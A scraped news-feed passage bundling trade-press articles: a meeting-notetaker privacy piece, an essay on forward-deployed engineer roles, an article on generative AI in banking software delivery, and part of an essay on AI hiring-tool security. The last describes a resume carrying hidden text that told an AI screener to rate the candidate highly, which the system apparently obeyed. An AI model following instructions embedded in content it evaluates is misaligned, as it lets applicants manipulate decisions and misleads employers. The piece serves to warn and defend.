<p class="wp-block-paragraph">“Notetaker is the second product on that path. Dictation took the keyboard out of writing. Notetaker takes it out of meetings, so nobody has to spend the call typing up what everyone just said.”</p>



<h2 class="wp-block-heading">User consent when recording calls</h2>



<p class="wp-block-paragraph">As AI note-taking tools have become more prevalent in the workplace, privacy concerns have arisen, including the need for all-party consent when recording a call in some jurisdictions, and whether meeting audio is used to train AI models. Two software vendors, <a href="https://www.computerworld.com/article/4041849/enterprise-note-taking-apps-face-legal-scrutiny-as-otter-hit-with-privacy-suit.html">Otter</a> and <a href="https://www.computerworld.com/article/4206255/granola-lawsuit-raises-concerns-over-ai-note-taking-app-privacy.html">Granola</a>, currently face separate lawsuits in California that allege privacy law violations related to their products.</p>



<p class="wp-block-paragraph">Wispr Flow Notetaker captures audio locally on a user’s device rather than joining the call as a visible bot. That means there’s no notification to signal that a conversation is being transcribed, which places responsibility on users to disclose the recording to others on the call in accordance with local laws, said Garja.</p>



<p class="wp-block-paragraph">“Users should always let the other person know before you start recording or transcribing a conversation, whether it’s a video call, an in-person meeting, or a phone call,” he said, adding that Wispr intends to build additional features for automated consent messaging “in the coming weeks.”</p>



<p class="wp-block-paragraph">Wispr doesn’t train its AI models on customer data without consent, though free and standard tier customers must choose to opt-out, according to Wispr’s privacy <a href="https://docs.wisprflow.ai/articles/3467817258-security-and-compliance-faq" target="_blank" rel="noreferrer noopener">terms</a>. Nor does it create “voiceprints or biometric profiles” of users or anyone else on a call using audio recording data, the company says.</p>



<p class="wp-block-paragraph">When Notetaker is active, conversation audio is captured on a user’s device and processed on cloud servers to enable transcription. The recorded audio file is encrypted and stored temporarily on the user’s device or cloud storage, Wispr said. After a limited period, the audio is automatically deleted.</p>



<p class="wp-block-paragraph">Notetaker is available with the Wispr Flow macOS app to free and paid subscribers, with support for Windows “coming soon.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[There are two completely different roles called ‘FDE’]]></title>
<description><![CDATA[There’s something very attractive about saying “we embed very closely with our customers and just figure it out with them”, especially since the company that started “forward deploying engineers” is growing 84% with $5B+ revenue. But “forward deployed engineer” is a vague term and means different...]]></description>
<link>https://tsecurity.de/de/3710144/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710144/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:39 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">There’s something very attractive about saying “we embed very closely with our customers and just figure it out with them”, especially since the company that started “forward deploying engineers” is growing <a href="https://investors.palantir.com/files/2026%20Q1%20PLTR%2010-Q.pdf">84% with $5B+ revenue</a>. But “<a href="https://en.wikipedia.org/wiki/Forward_Deployed_Engineer#cite_note-1">forward deployed engineer</a>” is a vague term and means different things depending on the business you’re running.</p>



<p class="wp-block-paragraph">I spent almost 5 years at Palantir as a forward-deployed software engineer, and Palantir’s version of an “FDE” does not make sense for most companies I now meet as an early-stage VC. Depending on the type of business you’re building, this role could broadly mean one of two things: “the product builder” or “the platform operator.” Clearly defining which bucket you fall into will make it easier to hire for this role and run your FDE org.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/nature-of-work-vs-product-leverage.png?w=1024" alt="Figure: Nature of work vs. product leverage." class="wp-image-4206317" width="1024" height="578" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<h2 class="wp-block-heading">The product builder: The OG Palantir version</h2>



<p class="wp-block-paragraph">The north star is: do whatever it takes to actually solve the user’s problem. FDEs are not just responsible for making the platform work, but also discovering what to build and building it (actually creating software) in service of the customer.</p>



<h2 class="wp-block-heading">The platform operator: Solutions + technical customer success</h2>



<p class="wp-block-paragraph">The north star is: make the product work for the customer – deploy and operationalize it. This is what most startups today really mean when they want FDEs. FDEs here configure the core platform, manage account relationships and drive adoption. This is not new – companies have always had solutions engineers, sales engineers, customer success etc., although the work looks different as FDEs are increasingly building prototypes, configuring evals and building MCPs.</p>



<h2 class="wp-block-heading">Which FDE is right for you</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/customer-size.png?w=1024" alt="Figure: Customer size." class="wp-image-4206316" width="1024" height="457" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<p class="wp-block-paragraph">For most situations, hiring product builder FDEs is a mistake.</p>



<p class="wp-block-paragraph">At scale, the FDEs should be the platform operator. It’s hard to have FDEs build and maintain highly custom product features, especially as the company scales. Over time, the custom product surface area distracts from building the core product, even though AI coding tools make it easy to ship new features quickly and maintain them.</p>



<p class="wp-block-paragraph">Many fast-growing AI startups recognize these constraints and structure the FDE role more like the platform operator. This also allows them to have 5-10 accounts per FDE, which is a much higher ratio than Palantir had (at least in 2023). Even the Palantir FDE role has evolved to look more like the platform operator.</p>



<p class="wp-block-paragraph">There are, however, situations when your FDEs should be the product builder archetype.</p>



<h3 class="wp-block-heading">1. You have very large customers (F500 scale)</h3>



<p class="wp-block-paragraph"><strong>Technical complexity</strong>: Large customers have complex environments with legacy infrastructure that often requires “out-of-platform” engineering work. I often encountered bespoke data infrastructure, privacy requirements, etc. at various Palantir customers that required me to build “out-of-platform” connectors, UIs and backends.</p>



<p class="wp-block-paragraph"><strong>Organizational inertia and trust</strong>: Serving large enterprises is about building trust. In short time periods, overfitting product to a specific user/workflow is often what delivers the most value, builds trust and helps organizations get over the inertia of moving away from Excel and legacy software tools that are part of their day-to-day workflow. For AI-native startups, it’s arguably even more important to invest in doing “unscalable” development with engineering boots on the ground, as it helps solidify your right to exist and eventually expand the customer relationship.</p>



<h3 class="wp-block-heading">2. You have many ICPs and workflows</h3>



<p class="wp-block-paragraph">If you have a broad range of ICPs and workflows that you serve, your product probably is not walk-up usable on day 1 of deployment. The short-term hacky things that product builder FDEs build to make the product work for these heterogeneous users/workflows will help you shape the product long-term.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/overfit-products.png?w=1024" alt='Figure: "Overfit" products.' class="wp-image-4206313" width="1024" height="570" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<p class="wp-block-paragraph">Note: see Palantir Foundry’s architecture <a href="https://www.palantir.com/assets/xrfr7uokpv1b/mhoyY4c8vdVlJhulDStk2/a7340768109c8e8d79d00b4cb99d8e70/Whitepaper_-_Foundry_2022.pdf">here</a>.</p>



<p class="wp-block-paragraph">This was a big reason why Palantir FDEs were more like product builders (and are still able to – see the <a href="https://jobs.lever.co/palantir/dab396d4-2f14-4796-aac0-0d82883dccf0">Forward Deployed Software Engineer job profiles</a> as an example). The vision for Foundry was to be the operating system for an enterprise’s critical decisions – inherently multiple industries, users and workflows. A lot of FDE-led development showed that solving many of these use cases required complex data integrations, which led to the early versions of Foundry being best-suited for complex data integrations and building a customer’s “<a href="https://blog.palantir.com/ontology-finding-meaning-in-data-palantir-rfx-blog-series-1-399bd1a5971b">Ontology</a>”. Similarly, FDEs like myself built custom frontend applications for fraud analysis, pricing, etc. As certain patterns of what these applications required became more clear, they were centralized into an application-layer product.</p>



<h2 class="wp-block-heading">Who you should hire</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/who-you-should-hire.png?w=1024" alt="Figure: Who you hire." class="wp-image-4206314" width="1024" height="464" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/why-hire.png?w=1024" alt="Figure: Why hire one vs. the other." class="wp-image-4206315" width="1024" height="456" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<p class="wp-block-paragraph"><strong>Platform operator</strong>: There is a much broader set of people you could hire, testing for technical fluency (e.g., being good at data analysis, complex Excel work, even SQL), product intuition and an inclination to build customer relationships. Backgrounds like technical customer success, solutions engineering, software engineering, product management and consulting are all strong fits.</p>



<p class="wp-block-paragraph"><strong>Product builder</strong>: You want candidates that are high ownership and missionary software engineers, or technical PMs who want to ship products themselves.</p>



<p class="wp-block-paragraph">Hiring for these profiles, especially product builders, is hard. It’s worth calling out two things that helped Palantir hire software engineers into what might be considered a less sexy role.</p>



<ol start="1" class="wp-block-list">
<li><strong>Culture of building at the edge</strong>: Strong engineers are motivated to build things. Palantir gave FDEs a lot of ownership to build products, which is why much of the core product leadership was former FDEs.</li>



<li><strong>Cult built around mission</strong>: Internally, there was a cult-like devotion to the mission. Everyone always talked about why outcomes were far more important than software, and why most companies building tools had it wrong. I’ve never been at a company where people feel so closely bonded around a mission.</li>
</ol>



<p class="wp-block-paragraph">As founders building AI startups think about hiring FDEs, it’s worth being specific about your culture and asking: Am I just hiring people to support development teams, or am I hiring people to shape and build product? It’s hard to get software engineers (even today) to be excited about an FDE role that might just be technical customer success.</p>



<h2 class="wp-block-heading">What FDEs should be doing (regardless of archetype)</h2>



<p class="wp-block-paragraph">You’ve hired the right people. How do you best leverage your team of FDEs?</p>



<p class="wp-block-paragraph">FDEs were Palantir’s way of delivering outcomes rather than tools. AI-native startups can take this much further and FDEs can help in a few unique ways by leveraging their proximity to customers.</p>



<ol start="1" class="wp-block-list">
<li><strong>Find the most critical workflows</strong>: As AI lowers the cost of producing software, companies will face a lot more competition. FDEs at AI startups should be constantly finding ways to serve the most critical workflows for a customer and paying attention to how customers do work across newer and legacy tools. For example, FDEs at Harvey should pay attention to which workflows are in Westlaw, which ones are moving to ChatGPT/Claude, and how the Harvey product can stay ahead.</li>



<li><strong>Build around nondeterminism</strong>: In more regulated environments, FDEs should be hyper-focused on making products reliable for specific use cases <a href="https://www.anthropic.com/engineering/demystifying-evals-for-ai-agents">using evals</a> and configs. Previously, product reliability lived with product and support. As companies provide outcomes instead of tools, configuring products appropriately and managing evals shifts towards FDE teams.</li>
</ol>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beyond chatbots: How embedded GenAI is transforming banking application development]]></title>
<description><![CDATA[Business application development is entering a new operating model. The traditional approach of gathering requirements, designing screens, writing services, integrating systems, testing, fixing defects and preparing release documentation still exists, but it is no longer sufficient for enterprise...]]></description>
<link>https://tsecurity.de/de/3710146/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710146/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:39 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Business application development is entering a new operating model. The traditional approach of gathering requirements, designing screens, writing services, integrating systems, testing, fixing defects and preparing release documentation still exists, but it is no longer sufficient for enterprises that need speed, traceability, resilience and regulatory confidence at the same time. Hyperautomation brings a broader discipline to this challenge. It combines workflow orchestration, intelligent document processing, robotic automation, API-led integration, process mining, test automation, observability and artificial intelligence into a connected delivery fabric. With embedded Generative AI, this fabric becomes more adaptive because applications can interpret natural language, summarize complex data, generate explanations, detect exceptions and support decision workflows rather than merely execute predefined rules.</p>



<p class="wp-block-paragraph">In banking, this shift is especially meaningful. Banks operate across dense application landscapes: trade reporting platforms, wealth management portals, core banking systems, investment banking applications, digital compliance engines, reconciliation utilities, operational dashboards, audit repositories and daily, weekly and monthly reporting platforms. Each of these areas has its own data models, control points, integration patterns, validation rules, exception paths and regulatory obligations. Hyperautomation does not replace engineering discipline; it strengthens it by making business intent, technical execution, control evidence and continuous improvement part of the same lifecycle.</p>



<h2 class="wp-block-heading">From automation to hyperautomation in banking applications</h2>



<p class="wp-block-paragraph">Automation usually addresses a specific task: moving data from one system to another, generating a report, running a batch job or validating a transaction against a rule. Hyperautomation goes further. It looks at the complete business outcome and asks how the entire chain can be streamlined, governed, observed and improved. For example, a trade reporting process may begin with transaction capture, enrich the trade with reference data, validate regulatory fields, identify breaks, generate a submission file, transmit it to a regulator or trade repository, monitor acknowledgements and preserve audit evidence. A narrow automation script may accelerate one step, but a <a href="https://www.gartner.com/en/documents/6454507">hyperautomated design</a> coordinates the complete flow, including exception handling and evidence generation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/figure-Figure-automation-vs-hyperautomation.png?w=1024" alt="Figure: Automation vs. hyperautomation." class="wp-image-4206308" width="1024" height="775" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p class="wp-block-paragraph"><strong>Figure: Automation vs. hyperautomation</strong></p>



<p class="wp-block-paragraph">Embedded Generative AI adds a <a href="https://assets.ctfassets.net/5965pury2lcm/65QHMnfLGaRJzJ0sX5982o/520b5f0a9745aecc8730c645994e3a3b/Forrester_Study_-_AI_And_The_Next_Generation_of_Software_Testing.pdf">new layer of intelligence</a>. Instead of forcing every user interaction into rigid screens and codes, business applications can accept natural language prompts, interpret document content, summarize cases, generate draft responses, explain anomalies, produce test scenarios and create release notes. In a banking environment, this intelligence must be carefully bounded. Every AI-assisted action should be traceable, explainable, reviewable and aligned with data privacy, model risk, information security and regulatory expectations. The goal is not uncontrolled autonomy; the goal is governed acceleration.</p>



<h2 class="wp-block-heading">Banking application components suitable for hyperautomation</h2>



<p class="wp-block-paragraph">A modern banking application is rarely a single monolithic system. It is a composition of business capabilities, integration services, workflow engines, data pipelines, user experience layers, analytics models, control dashboards and audit stores. Hyperautomation can accelerate the development and integration of these components by turning repetitive engineering work into <a href="https://www.everestgrp.com/report/egr-2024-31-v-6318/">reusable patterns</a> and by embedding intelligence directly into business processes.</p>



<ul class="wp-block-list">
<li><strong>Trade reporting applications:</strong> Generative AI can help map trade attributes to regulatory fields, explain validation failures, summarize rejected submissions and generate test cases for reporting scenarios. Hyperautomation can orchestrate enrichment, validation, submission, acknowledgement tracking and evidence archival.</li>



<li><strong>Wealth management platforms:</strong> Advisors can use embedded AI to summarize client portfolios, generate suitability narratives, identify missing documents and prepare personalized investment review notes. Automation can coordinate onboarding, risk profiling, document verification, portfolio rebalancing workflows and client communication approvals.</li>



<li><strong>Core banking applications:</strong> Account opening, loan servicing, deposits, payments, interest calculations and customer maintenance can benefit from automated validations, intelligent forms, workflow routing and natural language assistance for operations teams. AI can explain account events or transaction exceptions in plain language.</li>



<li><strong>Investment banking systems:</strong> Deal pipelines, research workflows, underwriting processes, trade lifecycle functions and risk calculations require strong coordination across front-office, middle-office and back-office platforms. Hyperautomation can standardize approvals, documentation, exception resolution and control evidence across these stages.</li>



<li><strong>Digital compliance applications:</strong> Compliance teams can use AI to summarize policy obligations, compare regulatory changes with internal controls, classify alerts, draft investigation notes and produce evidence packs. Automation ensures routing, approvals, segregation of duties, audit trails and regulatory reporting timelines are consistently enforced.</li>



<li><strong>Reconciliation platforms:</strong> AI can assist in matching narratives, explaining breaks, clustering exception patterns and suggesting resolution actions. Hyperautomation can pull data from ledgers, statements, payment processors, trading systems and data warehouses, then route unresolved breaks to the right teams.</li>



<li><strong>Reporting and audit applications:</strong> Daily, weekly and monthly reports can be generated through controlled data pipelines, automated quality checks, narrative generation, variance explanations and approval workflows. Audit applications can preserve lineage, approvals, source extracts, model outputs and control attestations.</li>
</ul>



<h2 class="wp-block-heading">Embedded generative AI as an application capability</h2>



<p class="wp-block-paragraph">Embedding Generative AI into business applications should be treated as an architectural capability, not as a decorative chatbot. A banking application may use AI for search, summarization, reasoning support, content generation, code generation, policy interpretation or anomaly explanation. Each use case requires clear boundaries. The application must know which data the model can access, which actions require approval, what evidence must be captured and where deterministic controls must override probabilistic <a href="https://www.idc.com/resource-center/generative-ai/">suggestions</a>.</p>



<p class="wp-block-paragraph">For example, in trade reporting, an embedded AI assistant can explain why a transaction failed validation and suggest likely fields to review. However, the final correction should pass through rule-based validations, maker-checker approval and audit logging. In wealth management, AI may draft a client review note based on portfolio movements and risk profile, but the advisor must verify suitability, disclosures and final communication. In reconciliation, AI can propose likely matches or categorize break reasons, while the system preserves the original data, confidence score, reviewer action and final resolution path.</p>



<h2 class="wp-block-heading">Hyperautomating the product development lifecycle</h2>



<p class="wp-block-paragraph">The Product Development Lifecycle can itself become hyperautomated. Instead of treating ideation, analysis, design, development, testing, security review, release and operations as disconnected phases, enterprises can create an AI-assisted delivery loop where every stage produces structured artifacts that the next stage can consume. Platforms such as GitHub Copilot, Claude Code or Claude Cowork-style agentic development environments and OpenAI Codex can support this movement by helping teams reason over requirements, generate code, create tests, review changes, modernize legacy modules and produce <a href="https://www.cio.com/article/1307309/the-generative-ai-revolution-is-transforming-how-banks-work.html">documentation</a>. Their value increases when they are connected to repositories, issue trackers, design documents, build pipelines, test suites, security scanners, observability data and enterprise knowledge bases.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>PDLC Stage</strong></td><td><strong>Hyperautomation Opportunity</strong></td><td><strong>AI-Assisted Outcome</strong></td></tr><tr><td>Business discovery</td><td>Process mining, domain interviews, regulatory mapping, backlog creation</td><td>Structured epics, user stories, acceptance criteria, process maps and control requirements</td></tr><tr><td>Architecture and design</td><td>Reference architectures, API contracts, data models, event flows, security patterns</td><td>Architecture options, integration blueprints, threat-model prompts and design decision records</td></tr><tr><td>Development</td><td>Code generation, service scaffolding, UI component creation, data pipeline templates</td><td>Review-ready code increments, reusable components, migration utilities and integration adapters</td></tr><tr><td>Testing</td><td>Unit, integration, regression, performance, compliance and synthetic data testing</td><td>Generated test cases, defect reproduction steps, test automation scripts and coverage summaries</td></tr><tr><td>Security and compliance review</td><td>Static analysis, dependency checks, policy validation, evidence capture</td><td>Risk explanations, remediation suggestions, control traceability and approval evidence</td></tr><tr><td>Release and deployment</td><td>CI/CD orchestration, environment promotion, release notes, rollback preparation</td><td>Automated deployment packs, release summaries, operational checklists and change records</td></tr><tr><td>Operations and feedback</td><td>Observability, incident analysis, user feedback mining, backlog refinement</td><td>Incident summaries, root-cause hypotheses, improvement stories and reliability recommendations</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Role of GitHub Copilot, Claude Cowork and Codex</h2>



<p class="wp-block-paragraph">GitHub Copilot is useful where developers need assistance inside the engineering flow: explaining code, generating functions, proposing tests, reviewing pull requests and helping teams move from issue to implementation. In a banking PDLC, it can accelerate microservice creation, API integration, batch processing logic, reconciliation rules, regulatory validation routines and UI workflows. When used with repository context and proper review discipline, it can reduce the time developers spend on repetitive coding while preserving human accountability for design and correctness.</p>



<p class="wp-block-paragraph">Claude Cowork or Claude Code-style agentic environments are valuable for multi-file reasoning, refactoring, debugging and documentation-heavy engineering work. Banking applications often contain deep domain logic scattered across services, configuration files, stored procedures, integration scripts and test suites. An agentic coding assistant that can understand a wider codebase context can help engineers analyze dependencies, prepare modernization plans, update multiple files coherently and draft explanations for reviewers. This is particularly useful in core banking modernization, trade reporting rule updates and compliance workflow refactoring.</p>



<p class="wp-block-paragraph">OpenAI Codex can support issue-to-pull-request workflows, test generation, code review, bug reproduction, migration activities and broader software engineering tasks across the lifecycle. In a hyperautomated PDLC, Codex-like agents can be assigned well-scoped work items, asked to inspect failing tests, propose fixes, create regression coverage and summarize the change for human reviewers. The important design principle is to keep agents inside controlled boundaries: clear prompts, repository permissions, test gates, approval workflows and traceable outputs.</p>



<h2 class="wp-block-heading">Integration architecture for hyperautomated banking applications</h2>



<p class="wp-block-paragraph">A practical architecture begins with business capability decomposition. Each banking domain should be expressed as a set of bounded capabilities such as customer onboarding, account maintenance, trade enrichment, exception management, portfolio review, control attestation, report generation and audit retrieval. These capabilities should be exposed through APIs, events, workflow tasks, data products and user interfaces. Hyperautomation then connects these capabilities using orchestration engines, event streams, rules engines, AI services, RPA connectors where legacy integration is unavoidable and observability layers that capture business and technical telemetry.</p>



<p class="wp-block-paragraph">The embedded AI layer should sit behind a secure application service boundary. It should use retrieval-augmented generation where approved policies, product rules, application documentation and regulatory mappings are retrieved from trusted sources. It should avoid uncontrolled exposure of sensitive customer information. Prompt templates, response validation, redaction, grounding checks, model monitoring and human-in-the-loop approval should be part of the production design. In banking, the most successful AI pattern is often not full automation but <a href="https://www.everestgrp.com/report/egr-2024-31-v-6318/">assisted</a> decisioning with strong controls.</p>



<h2 class="wp-block-heading">Example: Hyperautomated reconciliation and reporting flow</h2>



<p class="wp-block-paragraph">Consider a reconciliation application that compares ledger balances, payment files, trade settlement records and external statements. In a conventional model, operations teams spend significant time downloading files, running macros, investigating mismatches, documenting break reasons and preparing status reports. In a hyperautomated model, data ingestion is scheduled and monitored, schema checks run automatically, matching engines classify obvious matches, AI assists with ambiguous narratives, exceptions are routed through workflow queues and dashboards update in near real time. At the end of the day, the system can generate a draft operations <a href="https://www.pwc.com/us/en/industries/financial-services/library/hyperautomation-gen-ai-in-banking.html">report</a> explaining unresolved breaks, aging trends, risk exposure and pending approvals.</p>



<p class="wp-block-paragraph">The same pattern can extend to daily, weekly and monthly reporting. Data quality rules validate inputs, report templates are populated automatically, AI generates narrative commentary on variances, reviewers approve or amend explanations and the final report is archived with lineage and approvals. Audit teams can later retrieve not only the report but also the source extracts, transformation logs, exception history, reviewer decisions and AI-generated drafts. This creates a richer control environment than manual reporting because evidence is captured by design rather than reconstructed later.</p>



<h2 class="wp-block-heading">Governance, risk and control considerations</h2>



<p class="wp-block-paragraph">Hyperautomation in banking must be designed with governance from the beginning. The development team should define which activities can be automated, which can be AI-assisted and which must remain under human approval. Source code generated by AI must pass normal engineering controls, including peer review, static analysis, dependency scanning, secure coding checks, test execution and production readiness review. Business outputs generated by AI, such as compliance narratives or client-facing explanations, should be <a href="https://www.pwc.com/us/en/industries/financial-services/library/hyperautomation-gen-ai-in-banking.html">reviewed</a> where regulatory or reputational risk is material.</p>



<p class="wp-block-paragraph">Data governance is equally important. AI-enabled applications must respect data classification, residency, retention, masking and access policies. The model should not become an uncontrolled channel through which confidential customer, trading or employee information can leak. Every prompt, retrieved source, generated response, user action and final decision may need to be logged depending on the use case. For audit applications, this traceability is not optional; it is the foundation of trust.</p>



<h2 class="wp-block-heading">Operating model for AI-native PDLC</h2>



<p class="wp-block-paragraph">A hyperautomated PDLC requires changes in team behavior. Product owners should write requirements in a structured manner so that AI tools can generate better stories, acceptance criteria and test scenarios. Architects should maintain living decision records, reference patterns and integration standards that AI agents can use as context. Developers should learn prompt discipline, context packaging and review techniques. Test engineers should focus on coverage strategy, synthetic data, compliance scenarios and defect prevention rather than only manual execution. Operations teams should feed incident <a href="https://www.cio.com/article/1307309/the-generative-ai-revolution-is-transforming-how-banks-work.html">learnings</a> back into the backlog so the system improves continuously.</p>



<p class="wp-block-paragraph">The role of human experts becomes more important, not less. AI can draft, generate, compare and suggest, but domain judgment remains essential. A trade reporting specialist understands regulatory nuance. A wealth advisor understands client suitability. A core banking architect understands transaction integrity. A compliance officer understands control interpretation. Hyperautomation works best when it amplifies these experts and removes repetitive friction around them.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">Hyperautomation in business application development is not simply a faster way to write software. It is a new way to connect business intent, engineering execution, operational control and continuous learning. In banking, where applications must be reliable, explainable, secure and compliant, the combination of embedded Generative AI and disciplined automation can transform how applications are designed, built, integrated, tested, released and operated. Trade reporting, wealth management, core banking, investment banking, compliance, reconciliation, reporting and audit functions can all benefit when AI is embedded responsibly and automation is orchestrated across the complete lifecycle.</p>



<p class="wp-block-paragraph">Platforms such as GitHub Copilot, Claude Cowork or Claude Code and OpenAI Codex can play an important role in this transformation by accelerating analysis, development, testing, review, modernization and documentation. Their greatest value appears when enterprises treat them not as isolated productivity tools but as part of a governed, AI-native PDLC. The future of banking application development will belong to teams that can combine human expertise, reusable engineering patterns, intelligent automation and strong governance into one coherent delivery model.</p>



<p class="wp-block-paragraph"><em>This article was made possible by our partnership with the IASA </em><a href="https://chiefarchitectforum.org/" target="_blank" rel="noreferrer noopener"><em>Chief Architect Forum</em></a><em>. The CAF’s purpose is to test, challenge and support the art and science of Business Technology Architecture and its evolution over time as well as grow the influence and leadership of chief architects both inside and outside the profession. The CAF is a leadership community of the </em><a href="https://iasaglobal.org/" target="_blank" rel="noreferrer noopener"><em>IASA</em></a><em>, the leading non-profit professional association for business technology architects.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your AI hiring tool isn’t an HR problem. It’s a security one]]></title>
<description><![CDATA[For years, applicant tracking systems and recruiting platforms were treated as HR technology: Important for workflow, efficiency, compliance and candidate experience, but rarely viewed as core security infrastructure. That assumption no longer holds. Once AI begins reading resumes, scoring candid...]]></description>
<link>https://tsecurity.de/de/3710148/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710148/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:39 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For years, applicant tracking systems and recruiting platforms were treated as HR technology: Important for workflow, efficiency, compliance and candidate experience, but rarely viewed as core security infrastructure. That assumption no longer holds. Once AI begins reading resumes, scoring candidates, conducting interviews, ranking applicants and influencing who moves forward, the hiring platform stops being a passive system of record. It becomes a decision system.</p>



<p class="wp-block-paragraph">And any system that accepts public input, processes sensitive data and influences business decisions belongs inside the security conversation.</p>



<p class="wp-block-paragraph">I learned this during an AI hiring platform rollout that never made it to production. The vendor was established, the product had a strong market reputation and the AI feature looked attractive: Upload a resume, compare it to a job description and return a neat percentage match. For recruiters, it promised speed. For executives, it promised modernization.</p>



<p class="wp-block-paragraph">Before moving real candidate data into the system, I tested it with synthetic resumes. One weak resume came back with a surprisingly strong match. The reason was not hidden in the candidate’s experience. It was hidden in the text. The resume contained language instructing the AI to treat the candidate as an excellent fit, and the system appeared to follow that instruction instead of evaluating the resume on merit.</p>



<p class="wp-block-paragraph">That changed the question from “Does the tool improve productivity?” to “Can the person being evaluated influence the evaluation itself?”</p>



<p class="wp-block-paragraph">That is a security question.</p>



<h2 class="wp-block-heading">The trust boundary has moved</h2>



<p class="wp-block-paragraph">CIOs do not need to become recruiting experts. They only need to look at the mechanics.</p>



<p class="wp-block-paragraph">An anonymous user submits content into an enterprise system. That content is processed by software. The software then produces an output that can influence a business decision. In every other environment, security teams know what to call that: untrusted input crossing a trust boundary.</p>



<p class="wp-block-paragraph">The difference is that in hiring, the input looks harmless. It is a resume, a cover letter, a chatbot reply or a spoken answer in an AI-led interview. But once AI reads that content and treats it as instruction, the harmless-looking input becomes part of the system’s control surface.</p>



<p class="wp-block-paragraph">That is why prompt injection matters in hiring. It is not just an AI oddity or a model behavior issue. It is the same category of failure enterprises have spent decades trying to prevent: User-controlled input changing what the system does. <a href="https://genai.owasp.org/llmrisk/llm01-prompt-injection/">OWASP lists prompt injection as the first risk in its Top 10 for LLM applications</a>, describing it as a case where user prompts alter a model’s behavior or output in unintended ways.</p>



<p class="wp-block-paragraph">In hiring, the implication is direct: A candidate may be able to manipulate the score, ranking or interview assessment that determines whether a human ever sees them.</p>



<h2 class="wp-block-heading">The business impact is not theoretical</h2>



<p class="wp-block-paragraph">The obvious risk is that an unqualified candidate moves forward. But the impact is broader.</p>



<p class="wp-block-paragraph">First, decision quality degrades. Hiring teams adopt AI scoring because they believe it improves signal. If the score can be manipulated, the business is not gaining signal; it is gaining false confidence. Recruiters may spend time on candidates who gamed the system while stronger candidates are buried lower in the queue. A tool bought to reduce friction can quietly create more of it.</p>



<p class="wp-block-paragraph">Second, cost increases under the appearance of efficiency. Every false positive consumes recruiter time, hiring-manager attention, interview slots and opportunity cost. A small weakness in screening integrity can become a measurable operational drag across open roles.</p>



<p class="wp-block-paragraph">Third, trust suffers. Candidates already question whether AI hiring tools are fair, explainable or accurate. If it becomes clear that a screening system can be manipulated by hidden instructions or verbal prompting, the issue is no longer just security. It becomes reputational. Strong candidates may lose confidence in the process, and employers may have to defend decisions made by systems they did not fully understand.</p>



<p class="wp-block-paragraph">Fourth, sensitive data exposure becomes harder to contain. Recruiting systems hold names, addresses, work histories, education histories, compensation details, work authorization information and sometimes accommodation or demographic data. <a href="https://csrc.nist.gov/pubs/sp/800/122/final">NIST guidance on personally identifiable information</a> includes employment information as linkable personal data that must be protected from inappropriate access, use and disclosure. Yet hiring platforms often receive less security scrutiny than systems holding customer or financial data.</p>



<p class="wp-block-paragraph">That mismatch is dangerous: High-value data, public-facing workflows and increasing automation.</p>



